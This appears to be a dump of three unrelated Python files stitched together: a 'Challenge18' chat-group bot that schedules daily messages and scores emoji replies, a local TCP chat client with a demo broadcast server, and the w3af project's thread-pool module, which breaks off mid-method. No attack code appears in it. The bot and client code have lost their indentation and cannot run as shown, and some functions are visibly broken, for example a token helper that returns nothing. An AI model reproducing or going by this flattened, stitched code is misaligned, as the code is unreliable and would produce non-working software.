while(True):
simCounter = 0
while self.simulation:
if simCounter < 10:
simCounter += 1
time.sleep(0.1)
print("SIMULATION")
else:
time.sleep(1)
for ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
if "upcoming" not in challenge:
challenge["upcoming"] = {}
if "template" not in challenge:
challenge["template"] = "international"
sent = []
for up in challenge["upcoming"]:
# print("UP",up)
timeDiff = time.time() - search_dates(up)[0][1].timestamp()
passedTime = timeDiff > 0 and timeDiff < lastHour
if passedTime:
try:
day = challenge["today"]
# if day in self.push and up in self.push[day]:
if day in self.push[challenge["template"]] and up in self.push[challenge["template"]][day]:
content = self.push[challenge["template"]][day][up]
if content is not None:
content = content.replace(
"DDD", str(day)).replace("TTT", up)
print(
"#################### SENDING PUSH TO C18", ch, "DAY", day, "time", up)
sent.append(up)
# send to user
if self.isCommand(content):
tCommand = Thread(target = self.commands[content.split("/")[0]], args = [{"origin":ch, "content":content}])
tCommand.start()
else:
self.api.send(
ch, content, autoPreview=True)
needsBackup = True
except:
traceback.print_exc()
for up in sent:
challenge["upcoming"].pop(up)
# challenge["today"] += 1
time.sleep(5)
if needsBackup:
self.backup()
needsBackup = False
def isCommand(self, content):
return content.split("/")[0] in self.commands
def sendTotalHeb(self, data, ret = False):
return self.sendTotal(data,ret=ret, defaultLanguage = "hebrew")
    def sendPublic(self, data, ret = False, defaultLanguage = "international", strings = {"default": "{0}"}):
origin, content = None, ""
if "origin" in data:
origin = data["origin"]
res = self.getChallengeScore(data)
if res is not None:
self.api.send(
origin, strings["default"].format(res), autoPreview=True)
    def sendTotal(self, data, ret = False, defaultLanguage = "international", strings = {
"international":
'''
🌴🌴🌴🌴🌴🌴🌴
*Total Points in the group: {0}*
🐋🌸🙏
'''
,
"hebrew":
'''
🌴🌴🌴🌴🌴🌴🌴🌴
*ניקוד קבוצתי מצטבר: {0}*
🙏🌍 *אתגר 18* 🐋🌸
''',
"family":
'''
🌴🌴🌴🌴🌴🌴🌴
*Total Points in the group: {0}*
🐋🌸🙏
'''
,
"familyheb":
'''
🌴🌴🌴🌴🌴🌴🌴🌴
*ניקוד קבוצתי מצטבר: {0}*
🙏🌍 *אתגר 18* 🐋🌸
''',
}):
print("DDDDDDDDDDd")
print(data)
print("DDDDDDDDDDd")
origin, content = None, ""
if "origin" in data:
origin = data["origin"]
total = 0
if self.manager is None:
print("XXXXXXXXXXX NO MANAGER")
# self.manager = self.Challenge18Manager.share
# res = self.manager.getChallenge({"origin":origin})
res = self.getChallenge({"origin":origin})
print("RRRRRRRRRRRRRRRRRRRRR")
print("RRRRRRRRRRRRRRRRRRRRRoooooooo")
print(res)
print("RRRRRRRRRRRRRRRRRRRRR")
print("RRRRRRRRRRRRRRRRRRRRR")
if "template" in res:
defaultLanguage = res["template"].lower()
if defaultLanguage not in strings:
if "heb" in defaultLanguage:
defaultLanguage = "hebrew"
else:
defaultLanguage = "international"
print("RRRRRRRRRRRRRRRRRRRRRoooooooo", "template",defaultLanguage)
if "total" in res:
total += res["total"]
content = strings[defaultLanguage].format(str(total))
# content += str(total)+"*"
# content += "\n"
else:
content = ""
if not ret and content != "":
self.api.send(
origin, content, autoPreview=True)
else:
return content
def go(self):
resetLast2000 = False
while "challenges" not in self.db:
print("C18 waiting for db")
time.sleep(2)
if "last2000" not in self.db or resetLast2000:
self.db["last2000"] = 0
# self.backup()
print("22222222222222222222222222222222222222222222000")
while(True):
# if "upcoming" not in self.db or "0dict" not in str(type(self.db["upcoming"])):
# self.db["upcoming"] = {}
if "users" not in self.db:
self.db["users"] = {}
''' UPDATE CHALLENGE DAYS '''
''' SEND DAYLIES '''
''' USER engagment '''
''' check time after 20:00 '''
dayly = 60 * 60 * 23
# dayly = 60*60*13
# dayly = 60
atTime = "19:30"
# passed2000 = time.time() - search_dates("20:00")[0][1].timestamp() > 0
# print("C18",time.time(),"\nc18",search_dates(atTime)[0][1].timestamp(),"\n",self.db["last2000"])
passed2000 = time.time() - \
search_dates(atTime)[0][1].timestamp() > 0
try:
# print(passed2000, time.time() ,"\n", self.db["last2000"] ,"\n", dayly)
if passed2000 and time.time() - self.db["last2000"] > dayly:
self.db["last2000"] = time.time()
for ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
# for challenge in self.db["challenges"]:
# self.db["challenges"][challenge]["today"] += 1
self.db["challenges"][ch]["today"] = self.updateDay(self.db["challenges"][ch]["today"], ch = ch)
# if self.db["challenges"][challenge]["today"] == 0:
# self.db["challenges"][challenge]["today"] += 1
day = self.db["challenges"][ch]["today"]
if self.debug:
# send to user
self.api.send(
ch, "CHALLENGE CHANGED TO DAY " + str(day)+"\n"+self.db["challenges"][ch])
if "template" not in challenge:
challenge["template"] = "international"
if day in self.push[challenge["template"]]:
for tm in self.push[challenge["template"]][day]:
self.db["challenges"][ch]["upcoming"][tm] = "_"
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", ch,
"DAY: ", challenge["today"])
self.backup()
except:
traceback.print_exc()
# passed2000 update day += 1
# while len(self.db["upcoming"]) > 0:
# key = self.db["upcoming"].pop(0)
# origin, content = item
# for key in list(self.db["upcoming"].keys()):
# t = self.db["upcoming"][key]
# if time.time()-t > 0:
# userID,remID = key.split("_")
# self.remind(userID, remID)
#
#
#
time.sleep(3)
def loadDay(self, ch, origin = None):
if ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
# for challenge in self.db["challenges"]:
# self.db["challenges"][challenge]["today"] += 1
# self.db["challenges"][ch]["today"] = self.updateDay(self.db["challenges"][ch]["today"])
# if self.db["challenges"][challenge]["today"] == 0:
# self.db["challenges"][challenge]["today"] += 1
day = self.db["challenges"][ch]["today"]
if "template" not in challenge:
challenge["template"] = "international"
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
print("LOADING DAYYYYYYYYYYYYYYYYYYYYYYYYYY")
self.db["challenges"][ch]["upcoming"] = {}
if day in self.push[challenge["template"]]:
for tm in self.push[challenge["template"]][day]:
self.db["challenges"][ch]["upcoming"][tm] = "_"
print(day, self.push[challenge["template"]][day][tm] , "_____________________________")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@", ch,
"DAY: ", challenge["today"])
if origin:
# send to user
self.api.send(
origin, "CHALLENGE CHANGED TO DAY " + str(day)+"\n"+str(self.db["challenges"][ch]))
def prepUser(self, user, day):
if "days" not in self.db["users"][user]:
self.db["users"][user]["days"] = {}
if day not in self.db["users"][user]["days"]:
self.db["users"][user]["days"][day] = 0
if "score" not in self.db["users"][user]:
self.db["users"][user]["score"] = 1
def hasDay(self, msg):
return False, -1, msg
def emojiValue(self, char):
''' get emoji values '''
''' strip all characters '''
for k in self.emojiValues:
if char in self.emojiValues[k]:
return k
print(char + " in " + str(self.emojiValues[k]))
return 1
def char_is_emoji(self, character):
return character in emoji.UNICODE_EMOJI
def getScore(self, msg, max=6):
''' count hearts and emoji values '''
# nmsg = ''.join(c for c in msg if c.isprintable())
# if len(msg) != len(nmsg):
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# print("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH")
# msg = nmsg
sum = 0
backmsg = ""
for char in msg:
            if self.char_is_emoji(char) or char == "@":
print("CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC", msg)
print("x" + char + "x")
sum += self.emojiValue(char)
backmsg += char
return sum, backmsg.replace("@", "❤️")
def rate(self, group, msg, user):
print("RATE1")
challenge = None
if group in self.db["challenges"]:
print("RATE2")
challenge = self.db["challenges"][group]
day = challenge["today"]
isDay, d, m = self.hasDay(msg)
if isDay:
day = d
msg = m
''' max by day '''
score, backmsg = self.getScore(
msg.replace(" ", "").replace("❤️", "@"), max=6)
self.prepUser(user, day)
''' get score - later check by task'''
self.db["users"][user]["score"] += score
self.db["users"][user]["days"][day] += score
if score > 0:
''' for now just thankyou - later add custom message based on score / random '''
# sendBack = "🙏🌍 *Challenge18* 🐋🌸"+"\n\n*Thank you!* "+user.split("@")[0]+"\n*your current score is now "+str(self.db["users"][user]["score"])+"*"
sendBack = "🙏🌍 *Challenge18* 🐋🌸" + "\n" + "Day " + \
str(day) + " - " + backmsg + "\n*Thank you!* " + \
"\n*your current score is now " + \
str(self.db["users"][user]["score"]) + "*"
''' for now send directly to user - later in group '''
print("RATE3",user,sendBack)
self.api.send(user, sendBack) # send to user
# self.api.send(group,sendBack) # send to user
def process(self, info):
origin, user, content = None, None, None
if "origin" in info:
origin = info["origin"]
if "user" in info:
user = info["user"]
if "content" in info:
content = info["content"]
if "users" not in self.db:
self.db["users"] = {}
if "challenges" not in self.db:
self.db["challenges"] = {}
dbChanged = False
userID = str(user)
if userID not in self.db["users"]:
self.db["users"][userID] = {}
dbChanged = True
if origin not in self.db["challenges"]:
self.db["challenges"][origin] = self.formatChallenge()
dbChanged = True
challenge = self.db["challenges"][origin]
if "template" not in challenge:
challenge["template"] = "international"
if "day=" in content.lower():
for m in self.addMasters:
if user.split("@")[0] in m:
gotDay = None
                    res = re.findall(r"[-\d]+", content)
if len(res) > 0:
try:
gotDay = int(res[0])
except:
traceback.print_exc()
if "template" not in self.db["challenges"][origin]:
self.db["challenges"][origin]["template"] = "international"
self.db["challenges"][origin] = self.formatChallenge(
day=gotDay, template = self.db["challenges"][origin]["template"])
# self.loadDay(origin)
self.api.send(origin, "CHALLENGE CHANGED TO DAY " + str(self.db["challenges"][origin]["today"]) + "\n" + str(self.db["challenges"][origin])) # send to user
dbChanged = True
if "template=" in content.lower() or "tem=" in content.lower():
for m in self.addMasters:
if user.split("@")[0] in m:
gotTemplate = None
# res = re.findall("[-\d]+", content)
res = content.split("=")[1]
if len(res) > 0 and res in self.push:
try:
self.db["challenges"][origin]["template"] = res
self.db["challenges"][origin] = self.formatChallenge(
day=self.db["challenges"][origin]["today"], template = self.db["challenges"][origin]["template"])
self.api.send(origin, "CHALLENGE TEMPLATE TO " + self.db["challenges"][origin]["template"]) # send to user
dbChanged = True
except:
traceback.print_exc()
self.api.send(origin, "COULD NOT CHANGE TEMPLATE ERROR"+traceback.format_exc()) # send to user
else:
txt = "COULD NOT CHANGE TEMPLATE to "+res
txt+= "\n\nAvailable templates:\n"
for k in self.push:
txt+=k+"\n"
self.api.send(origin, txt) # send to user
elif "sim" == content.split("/")[0].lower():
for m in self.addMasters:
if user.split("@")[0] in m:
self.simulation = True
emptyContent = False
noTimes = True
allDays = False
showDay = 3
if "all" in content:
allDays = True
elif len(content.split("/")) > 1:
try:
simDay = int(content.split("/")[1])
showDay = simDay
except :
pass
currentDay = self.db["challenges"][origin]["today"]
# send to user
self.api.send(
origin, "SIMULATING ALL DAYS OF THE CHALLENGE !!!!!!! READY? GO!")
for d in self.push[challenge["template"]]:
if (d > (showDay-1) and d < (showDay+1)) or allDays:
self.db["challenges"][origin] = self.formatChallenge(
day=d, template = self.db["challenges"][origin]["template"])
self.api.send(origin, "=====================\n(Simulation) DAY " + str(self.db["challenges"][origin]["today"]) + "\n" + str(
self.db["challenges"][origin]) + "\n\n=====================") # send to user
print("_____________________________________")
print("_____________________________________")
print("_____________________________________")
print("DAY ", d)
time.sleep(.5)
print(self.push[challenge["template"]][d].keys())
print(str(self.db["challenges"]
[origin]["upcoming"]))
for atTime, v in self.db["challenges"][origin]["upcoming"].items():
print("_____________________________________")
print()
print(d, "AT TIME:::", atTime)
sendTxt = str(self.push[challenge["template"]][d][atTime])
if "#totalPointsHeb" in sendTxt:
sendTxt = self.sendTotal({"origin":origin, "content":""},ret=True)
elif "#totalPoints" in sendTxt:
sendTxt = self.sendTotal({"origin":origin, "content":""},ret=True)
if noTimes:
self.api.send(origin, sendTxt, autoPreview=True)
elif not emptyContent:
self.api.send(origin, "DAY " + str(d) + " " + atTime +
"\n\n\n" + sendTxt, autoPreview=True)
else:
self.api.send(
origin, "DAY " + str(d) + " " + atTime + "\n", autoPreview=True)
time.sleep(.5)
self.db["challenges"][origin] = self.formatChallenge(
day=currentDay)
self.api.send(origin, "FIN - SIMULATING - BACK TO DAY " + str(
self.db["challenges"][origin]["today"]) + "\n" + str(self.db["challenges"][origin]))
self.simulation = False
else:
thisDay = self.db["challenges"][origin]["today"]
if userID not in self.excludeNumbers:
firstWord = content.split("\n")[0].split(" ")[0]
if firstWord not in self.commands:
goRate = True
if "username" not in self.db["users"][userID] or self.db["users"][userID]["username"] is None:
if "user=" not in firstWord.lower():
self.signupUser(userID, origin)
else:
regRes = self.registerUsername(firstWord.split("=")[1], userID)
goRate = False
if regRes:
dbChanged = True
else:
tCommand = Thread(target = self.commands[content.split("/")[0]], args = [{"origin":origin, "content":content}])
tCommand.start()
goRate = False
dbChanged = False
if thisDay < 0 or thisDay>9999:
print("DONT RATE BEFORE FIRSTDAY", thisDay)
goRate = False
if goRate:
self.rate(origin, content, userID)
dbChanged = True
else:
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
print("SHARON!!!!!!!!!!!!")
# user = self.db["users"][userID]
if dbChanged:
self.backup()
# self.api.backup(self.db)
def signupUser(self, userID, challengeGroup):
signupMessage = "To show up on the scoreboard please choose a username, and send back:\n\n*user=MyUserName*"
self.api.send(userID, signupMessage, autoPreview=True)
    def registerUsername(self, username, userID, fullData=None):
res = self.usernameLegal(username, userID)
if res[0]:
res2 = self.checkPhone(userID)
if not res2[0]:
return res2
if userID not in self.db["users"]:
self.db["users"][userID] = {}
self.db["users"][userID]["username"] = username #xxx
if "register" in fullData:
for k in fullData["register"]:
self.db["users"][userID][k] = fullData["register"][k]
elif fullData is not None and "dict" in str(type(fullData)) and len(fullData) > 1:
for k in fullData:
self.db["users"][userID][k] = fullData[k]
self.backup()
else:
return res
sendBack = res[1]
self.api.send(userID, sendBack, autoPreview=True)
return res
def usernameLegal(self, username, userID):
for user in self.db["users"]:
if "username" in self.db["users"][user]:
# print("#####################")
# print(user["username"], userID)
if self.db["users"][user]["username"] == username and user != userID:
return False, "Oops! This username is already taken,\nplease choose another :)"
return True, "Great! your username is now: *{0}*".format(username)
def checkUsername(self, username):
for user in self.db["users"]:
if "username" in self.db["users"][user]:
if self.db["users"][user]["username"].lower() == username.lower():
return False, "Oops! This username is already taken,\nplease choose another :)"
return True, "Great! you can register with username: *{0}*".format(username)
def checkPhone(self, userID):
userID = userID.split("@")[0].strip("+")+"@c.us"
if userID in self.db["users"]:
if "username" in self.db["users"][userID] and self.db["users"][userID]["username"] is not None and len(self.db["users"][userID]["username"]) > 1:
return False, "Oops! This phone is already taken,\nplease choose another :)"
return True, "Great! you can register with this phone *{0}*".format(userID)
# https://flask-jwt-extended.readthedocs.io/en/stable/basic_usage/
def getToken(self, userID):
access_token = create_access_token(identity=userID)
def signIn(self, username, userID):
print("SIGN IN {0},{1}".format(username,userID))
for user in self.db["users"]:
if "username" in self.db["users"][user]:
if self.db["users"][user]["username"] == username and user == userID:
print("FUCK YEA")
print("FUCK YEA")
print("FUCK YEA")
print("FUCK YEA")
return True, userID
return False, userID
def backup(self):
self.api.backup(self.db)
# self.api.backup({"upcoming":self.db["upcoming"],"users":User.usersToJSONusers(self.db["users"])})
def formatChallenge(self, day=None, template = "international"):
if day is None:
today = datetime.date.today()
if today == today + datetime.timedelta((0 - today.weekday()) % 7, weeks=0):
day = today + \
datetime.timedelta((0 - today.weekday()) % 7, weeks=1)
else:
day = today + \
datetime.timedelta((0 - today.weekday()) % 7, weeks=0)
day = (0 - today.weekday()) % 7
            if day == 0:
day = -7
else:
day = -1 * day
day = day - 7
nc = {"today": day, "upcoming": {}, "template": template}
# for k in cFormat:
# nc[k] = cFormat[k]
#
# nc["today"] = day
# if "upcoming" not in nc:
# nc["upcoming"] = {}
if day in self.push[template]:
for tm in self.push[template][day]:
nc["upcoming"][tm] = "_"
return nc
def updateDB(self, db):
self.db = db
    def nextNextMonday(self):
        # Monday after next, using the same timedelta pattern as formatChallenge()
        today = datetime.date.today()
        return today + datetime.timedelta((0 - today.weekday()) % 7, weeks=1)
def welcomeUser(self, origin):
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
print("WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW")
if "users" not in self.db:
self.db["users"] = {}
# if origin not in self.db["users"]:
# self.db["users"][origin] = origin
# self.backup()
if "challenges" not in self.db:
self.db["challenges"] = {}
if origin not in self.db["challenges"]:
# res = search_dates("next monday 20:00", add_detected_language=True)
# if res is not None:
# res= res[0][1]
# else:
# pass
self.db["challenges"][origin] = self.formatChallenge()
self.api.send(origin, "CHALLENGE SET TO DAY " + str(
self.db["challenges"][origin]["today"]) + "\n" + str(self.db["challenges"][origin])) # send to user
dbChanged = True
|
node.py
|
import socket
import time
import threading
TCP_IP = "127.0.0.1"
TCP_PORT = 5007
BUFFER_SIZE = 1024
session_end = False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3.0)
s.connect((TCP_IP, TCP_PORT))
def handler(user_socket):
while True:
if (session_end == True):
break
try:
data = user_socket.recv(BUFFER_SIZE)
            if not data:
                # recv() returns b'' once the server closes the connection
                break
print()
print ("Broadcast: " + data.decode('utf-8'))
except socket.timeout:
continue
user_handler = threading.Thread(target=handler, args = (s,))
user_handler.start()
while not session_end:
time.sleep(0.1)
input_data = input("What would you like to send? (exit): ")
print ()
if (input_data == "exit"):
session_end = True
print ("session end")
user_handler.join()
break
s.send(input_data.encode('utf-8'))
s.close()
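# Companion sketch (not part of the client above): a minimal broadcast server
# for exercising this client locally. Run demo_server() in a separate
# interpreter before starting the client; the function name is made up.
def demo_server(host=TCP_IP, port=TCP_PORT):
    clients = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    def serve(conn):
        while True:
            data = conn.recv(BUFFER_SIZE)
            if not data:
                clients.remove(conn)
                conn.close()
                return
            # re-broadcast the received bytes to every connected client
            for other in list(clients):
                try:
                    other.send(data)
                except OSError:
                    pass  # client went away between recv and send
    while True:
        conn, _addr = srv.accept()
        clients.append(conn)
        threading.Thread(target=serve, args=(conn,), daemon=True).start()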
|
threadpool.py
|
"""
threadpool.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import sys
import time
import Queue
import threading
import traceback
from functools import partial
from multiprocessing.dummy import Process, current_process
from multiprocessing.util import Finalize, debug
from multiprocessing import cpu_count
from .pool276 import ThreadPool, RUN, create_detailed_pickling_error, mapstar
from w3af.core.data.fuzzer.utils import rand_alnum
from w3af.core.controllers.threads.decorators import apply_with_return_error
__all__ = ['Pool', 'return_args', 'one_to_many']
class one_to_many(object):
"""
This is a simple wrapper that translates one argument to many in a function
call. Useful for passing to the threadpool map function.
"""
def __init__(self, func):
self.func_orig = func
# Similar to functools wraps
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, args):
return self.func_orig(*args)
class return_args(object):
"""
Utility function that returns the args in the result, useful when calling
functions like imap_unordered().
"""
def __init__(self, func, *args, **kwds):
self.func = partial(func, *args, **kwds)
# Similar to functools wraps
self.func_orig = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, *args, **kwds):
return args, self.func(*args, **kwds)
class DaemonProcess(Process):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
super(DaemonProcess, self).__init__(group, target, name, args, kwargs)
self.daemon = True
self.worker = target
self.name = name
def get_state(self):
state = self.worker.get_state()
state['name'] = self.name
return state
def is_idle(self):
return self.worker.is_idle()
def start(self):
"""
This is a race condition in DaemonProcess.start() which was found
during some of the test scans I run. The race condition exists
because we're using Threads for a Pool that was designed to be
used with real processes: thus there is no worker.exitcode,
thus it has to be simulated in a race condition-prone way.
I'm overriding this method in order to move this line:
self._start_called = True
Closer to the call to .start(), which should reduce the chances
of triggering the race conditions by 1% ;-)
"""
assert self._parent is current_process()
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
self._start_called = True
threading.Thread.start(self)
def add_traceback_string(_exception):
"""
Add the traceback string as a new attribute to the exception raised
by the target function defined by the developer.
Adding this original traceback allows us to better understand the
root cause for exceptions that happen in functions which are run inside
the Pool (most).
For example, this is an exception stored in a /tmp/w3af-crash file before
this patch:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
File "/home/user/tools/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py", line 533, in _discover_worker
result = plugin.discover_wrapper(fuzzable_request)
File "/home/user/tools/w3af/w3af/core/controllers/plugins/crawl_plugin.py", line 53, in crawl_wrapper
return self.crawl(fuzzable_request_copy)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 148, in crawl
self.worker_pool.map_multi_args(self._check_and_analyze, args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 430, in map_multi_args
return self.map_async(one_to_many(func), iterable, chunksize).get()
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 643, in get
raise self._value
And after adding the original traceback and using it in exception_handler.py:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
Traceback (most recent call last):
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 238, in __call__
result = (True, func(*args, **kwds))
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 67, in mapstar
return map(*args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 55, in __call__
return self.func_orig(*args)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 180, in _check_and_analyze
1.0 - None
TypeError: unsupported operand type(s) for -: 'float' and 'NoneType'
The exact line where the exception is raised is shown!
Adding new attributes to instances is not something I like, but in
this case I had no choice...
Creating a new Exception type and wrapping all exceptions generated
by the pool with that one wouldn't work: we lose the exception type
and can't do:
try:
...
except TypeError:
...
The code for the whole framework would need to be changed to something
like:
try:
...
except PoolException, pe:
if isinstance(pe.original_exception, TypeError):
...
:param _exception: The exception instance where to add the new attribute
:return: None
"""
except_type, except_class, tb = sys.exc_info()
tb = traceback.format_exception(type(_exception), _exception, tb)
_exception.original_traceback_string = ''.join(tb)
class Worker(object):
__slots__ = ('func', 'args', 'kwargs', 'start_time', 'job', 'id')
def __init__(self):
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
self.id = rand_alnum(8)
def is_idle(self):
return self.func is None
def get_real_func_name_args(self):
"""
Because of various levels of abstraction the function name is not always in
self.func.__name__, this method "unwraps" the abstractions and shows us
something easier to digest.
:return: The function name
"""
# self.func/self.args could change over the execution of this method, so take
# a copy here.
current_func = self.func
current_args = self.args
if current_func is mapstar:
current_func = current_args[0][0]
current_args = current_args[0][1:]
if current_func is apply_with_return_error:
current_func = current_args[0][0]
current_args = current_args[0][1:]
if isinstance(current_func, return_args):
return current_func.func_orig.__name__, current_args
if isinstance(current_func, one_to_many):
return current_func.func_orig.__name__, current_args
if current_func is None:
return None, None
return current_func.__name__, current_args
def get_state(self):
func_name, func_args = self.get_real_func_name_args()
return {'func_name': func_name,
'args': func_args,
'kwargs': self.kwargs,
'start_time': self.start_time,
'idle': self.is_idle(),
'job': self.job,
'worker_id': self.id}
def __call__(self, inqueue, outqueue, initializer=None, initargs=(), maxtasks=None):
assert maxtasks is None or (type(maxtasks) in (int, long) and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
initializer(*initargs)
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, IOError):
debug('worker got EOFError or IOError -- exiting')
break
if task is None:
debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
# Tracking
self.func = func
self.args = args
self.kwargs = kwds
self.start_time = time.time()
self.job = job
try:
result = (True, func(*args, **kwds))
except Exception, e:
add_traceback_string(e)
result = (False, e)
# Tracking
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
try:
put((job, i, result))
except Exception as e:
wrapped = create_detailed_pickling_error(e, result[1])
put((job, i, (False, wrapped)))
finally:
# https://bugs.python.org/issue29861
task = None
job = None
result = None
func = None
args = None
kwds = None
completed += 1
debug('worker exiting after %d tasks' % completed)
class Pool(ThreadPool):
def __init__(self, processes=None, initializer=None, initargs=(),
worker_names=None, maxtasksperchild=None,
max_queued_tasks=0):
"""
Overriding this method in order to:
* Name the pool worker threads
* Name the threads used for managing the Pool internals
"""
self.Process = partial(DaemonProcess, name=worker_names)
self.worker_names = worker_names
# Setting the max number of queued tasks for the ThreadPool is not
# as simple as it looks.
#
# First I tried to limit the max size of self._inqueue (defined
# in _setup_queues), that didn't work.
#
# Then I tried to limit the size for self._taskqueue, that didn't
# work either.
#
# I had to set the maxsize of self._taskqueue to 1 and use the
# max_queued_tasks parameter to limit the size of self._inqueue
# This is required due to the ThreadPool internals, see the
# definition of the _handle_tasks method in pool276.py where
# the function is reading from self._taskqueue and writing to
# self._inqueue.
#
# Not setting the limit in self._taskqueue allows the main thread
# to enqueue an infinite number of tasks.
#
# Only setting the limit in self._taskqueue will not work, since
# the _handle_tasks method is always reading from that queue
# (which decreases its size) and writing to self._inqueue. Because
# of those reads to self._taskqueue, the queue never reaches the
# limit.
#
if max_queued_tasks != 0:
assert max_queued_tasks - 1 > 0, 'max_queued_tasks needs to be at least 2'
self._setup_queues(max_queued_tasks - 1)
self._taskqueue = Queue.Queue(maxsize=1)
self._cache = {}
self._state = RUN
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
if processes is None:
try:
processes = cpu_count()
except NotImplementedError:
processes = 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if initializer is not None and not hasattr(initializer, '__call__'):
raise TypeError('initializer must be a callable')
self._processes = processes
self._pool = []
self._repopulate_pool()
self._worker_handler = threading.Thread(
target=Pool._handle_workers,
args=(self, ),
name='PoolWorkerHandler')
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()
self._task_handler = threading.Thread(
target=Pool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache),
name='PoolTaskHandler')
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()
self._result_handler = threading.Thread(
target=Pool._handle_results,
args=(self._outqueue, self._quick_get, self._cache),
name='PoolResultHandler')
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15)
def get_inqueue(self):
return self._inqueue
def get_outqueue(self):
return self._outqueue
def get_running_task_count(self):
# Cheating here a little bit because the task queued in _inqueue will
# eventually be run by the pool, but is not yet in the pool
running_tasks = self._inqueue.qsize()
for process in self._pool[:]:
if not process.is_idle():
running_tasks += 1
return running_tasks
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
I overwrite this in order to change the Process target to a Worker
object (instead of a function) in order to keep better stats of
what it is doing.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=Worker(),
args=(self._inqueue,
self._outqueue,
self._initializer,
self._initargs,
self._maxtasksperchild))
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
debug('added worker')
def get_worker_count(self):
return len(self._pool)
def set_worker_count(self, count):
"""
Set the number of workers.
Keep in mind that this is not an immediate when decreasing
the pool process count!
* When increasing the size, the threadpool will call
repopulate_pool() and the new threads will be created
* When decreasing the size, a thread will finish because
of maxtasksperchild, then repopulate_pool() will be
called async and the thread will *not* be created,
thus decreasing the pool size
The change is made effective depending on the work load and
the time required to finish each task.
:param count: The new process count
:return: None
"""
assert self._maxtasksperchild, 'Can only adjust size if maxtasksperchild is set'
assert count >= 1, 'Number of processes must be at least 1'
self._processes = count
self._repopulate_pool()
def _setup_queues(self, max_queued_tasks):
self._inqueue = Queue.Queue(maxsize=max_queued_tasks)
self._outqueue = Queue.Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def map_multi_args(self, func, iterable, chunksize=None):
"""
Blocks until all results are done (please note the .get())
"""
assert self._state == RUN
